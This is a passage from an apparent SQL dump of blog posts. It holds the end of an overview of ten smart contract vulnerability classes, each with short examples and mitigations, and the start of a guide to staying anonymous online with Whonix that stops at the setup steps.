class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Unauthorized minting of tokens</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Unauthorized asset transfers</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Access Control Vulnerabilities:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Implement strict role-based access controls.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use industry-tested libraries for permission checks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Conduct regular audits to identify and fix misconfiguration.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Price Oracle Manipulation</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Price oracles fetch external data for smart contracts. If these oracles are compromised, attackers can tamper with data feeds, causing financial losses or operational failures.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Manipulating token prices to exploit DeFi lending platforms</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Forcing liquidation of assets at manipulated values</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Price Oracle Manipulation:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use decentralized oracles, such as Chainlink, to reduce dependency on a single source.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Include sanity checks to validate fetched data.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Logic Errors in Business Logic</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Logic errors result when smart contracts deviate from intended functionality, often leading to costly mistakes. These vulnerabilities can arise from flawed coding or shallow domain knowledge.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Incorrect token distribution during launches</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Lending platform miscalculations resulting in fund loss</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Logic Errors:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Conduct robust unit and integration testing throughout development.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Collaborate with domain experts to ensure the accuracy of business logic.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Lack of Input Validation</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When contracts fail to validate user inputs, they become susceptible to malicious manipulation. Unchecked inputs may disrupt a contract’s logic or trigger unintended behaviors.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Malicious payloads bypassing intended transaction limits</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Incorrect function execution due to invalid parameter inputs</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Lack of Input Validation:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Rigorously validate all user inputs during development.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Integrate defensive programming techniques to safeguard contract logic.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Reentrancy Attacks</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A reentrancy vulnerability allows an attacker to repetitively invoke a vulnerable function before its initial execution completes. This can lead to drained contract funds or disrupted operations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Exploiting withdrawal functions in DeFi protocols</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Manipulating account balances via recursive calls</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Reentrancy Attacks:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Follow the “Checks-Effects-Interactions” pattern when structuring functions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use reentrancy guards from trusted libraries like OpenZeppelin.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. <b><strong class=\"font-bold\">Unchecked External Calls</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When a contract fails to handle external call results properly, it can lead to unintended behaviors, resulting in potential loss of funds or data integrity issues.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Triggering unintended consequence due to failed contract interactions</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Exploiting unchecked call returns to bypass intended outcomes</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Unchecked External Calls:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Always verify the success of external function calls.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Limit external calls to minimize opportunities for exploitation.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. <b><strong class=\"font-bold\">Flash Loan Attacks</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Typically used for legitimate purposes, flash loans can be exploited to manipulate financial protocols within a single transaction. Attackers often use flash loans to drain liquidity or exploit arbitrary logic.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Artificially inflating token prices and dumping their holdings</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Draining liquidity from decentralized exchanges (DEXs)</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Flash Loan Attacks:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Introduce sanity checks for multi-operation transactions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Impose time-locks or delays on specific high-risk functionalities.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. <b><strong class=\"font-bold\">Integer Overflow and Underflow</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Integer overflows and underflows occur when numeric values push beyond or below their designated limits. Such errors often result in miscalculations or exploits, including unauthorized token generation.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Tokens \"wrapping around\" to astronomically high balances</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Severe fund mismanagement in financial contracts</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Integer Overflow and Underflow:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Leverage safe math libraries, such as SafeMath.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use Solidity’s built-in checked arithmetic for contracts written in version 0.8.0+.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">9. <b><strong class=\"font-bold\">Insecure Randomness</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Generating secure randomness in a deterministic blockchain environment is challenging. Predictable or controllable random numbers can lead to exploitation in lotteries, token distributions, or similar processes.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Exploited lotteries due to predictable block timestamps</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Abused predictive algorithms for token airdrops</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Insecure Randomness:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use reliable sources like Chainlink’s VRF (Verifiable Random Function).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid using blockchain parameters (e.g., block timestamps) for randomness.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">10. <b><strong class=\"font-bold\">Denial of Service (DoS) Attacks</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">DoS attacks aim to exhaust resources, rendering a smart contract non-functional. These attacks are designed to disrupt normal operations, often by exploiting inefficiencies like high gas consumption.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Gas-intensive loops preventing the execution of critical functions</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Overloading inputs to strain contract processing capacities</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate DoS Attacks:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Optimize gas usage within smart contracts by minimizing computation-heavy functions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Limit user inputs to prevent resource overuse.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Addressing These Vulnerabilities is Crucial</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These vulnerabilities represent the most critical challenges facing smart contract security in 2025. Failing to address them can result in compromised assets, disrupted services, and eroded trust in the blockchain ecosystem.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By focusing on secure development practices, regularly auditing code, and using well-tested libraries, developers can significantly reduce risks.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The OWASP Top 10 for 2025 serves as an essential guide for developers and organizations navigating blockchain advancements. By proactively addressing the vulnerabilities outlined here, blockchain stakeholders can establish safer and more reliable smart contract ecosystems.</p>', '', NULL, NULL, 1, 'draft', '2025-01-22 00:08:49', '2026-01-12 21:41:44', 'Information Security', 'OWASP Top 10 Smart Contract Vulnerabilities for 2025', '', NULL),
(65, 'How to Become Invisible on the Internet with Whonix', 'how-to-become-invisible-on-the-internet-with-whonix', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">As the digital age advances, online privacy is becoming more critical than ever. Cybersecurity threats are rampant, and maintaining a shield of anonymity is no longer a luxury—it\'s a necessity for privacy enthusiasts, cybersecurity professionals, and anyone who values their online security. Enter <b><strong class=\"font-bold\">Whonix</strong></b>—a powerful tool designed to help you stay invisible on the internet.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog will introduce you to Whonix, highlight its capabilities, and provide actionable steps to achieve unparalleled privacy and anonymity online.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Whonix?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">At its core, <b><strong class=\"font-bold\">Whonix</strong></b> is a privacy-focused operating system built to offer users maximum online anonymity. Unlike traditional operating systems, Whonix runs in a collection of virtual machines and routes all your internet traffic through the Tor network. Its architecture is resistant to IP leaks, offering a highly robust solution to safeguard your online identity.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you\'re working in cybersecurity, exploring internet privacy, or simply trying to remain invisible online, Whonix provides a rock-solid foundation for staying undetectable.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features of Whonix</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s what makes Whonix stand out among other privacy-focused tools and technologies:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Tor Integration</strong></b>: All traffic is routed through the Tor network for anonymous communication and browsing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Isolation in Virtual Machines</strong></b>: Whonix segregates your tasks into two virtual machines—a Whonix-Gateway (which only interacts with Tor) and a Whonix-Workstation (for user applications).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Protection Against Malware and IP Leaks</strong></b>: Even if your applications are compromised, Whonix keeps your real IP address secure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Open-Source Transparency</strong></b>: Whonix is entirely open-source, which means anyone can audit its code to ensure it’s free from vulnerabilities or backdoors.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why You Need Whonix for Online Privacy</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. IP Address Protection</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the biggest giveaways of your online identity is your IP address. Whonix ensures that your actual IP address is never exposed to the websites or services you access online, making it a critical tool for anonymity. Even if a malicious script tries to bypass your browser\'s anonymity, Whonix\'s architecture ensures that your IP remains hidden.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Resistance to Tracking and Surveillance</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Governments, hackers, and corporations often track or monitor online activity. By using Tor, Whonix makes it extremely difficult for anyone to trace your online activity or build a profile of your behavior.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Anonymity for High-Security Tasks</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you\'re handling sensitive information or conducting research that demands a high level of privacy, Whonix creates an environment where your activity cannot be traced back to you.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. Learning Cybersecurity Techniques</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whonix is also a valuable tool for cybersecurity professionals and enthusiasts. It offers a practical way to explore advanced anonymity techniques and test secure configurations.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Set Up Whonix for Maximum Privacy</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Follow these steps to set up Whonix and start your journey toward becoming invisible on the internet.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Install Virtualization Software</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whonix operates in virtual machines, so you’ll need to install virtualization software like <b><strong class=\"font-bold\">VirtualBox</strong></b> or <b><strong class=\"font-bold\">KVM</strong></b>. These platforms allow you to run Whonix without interfering with your main operating system.</p>\r\n\r\n<h3 class=\"font-bold text-h4 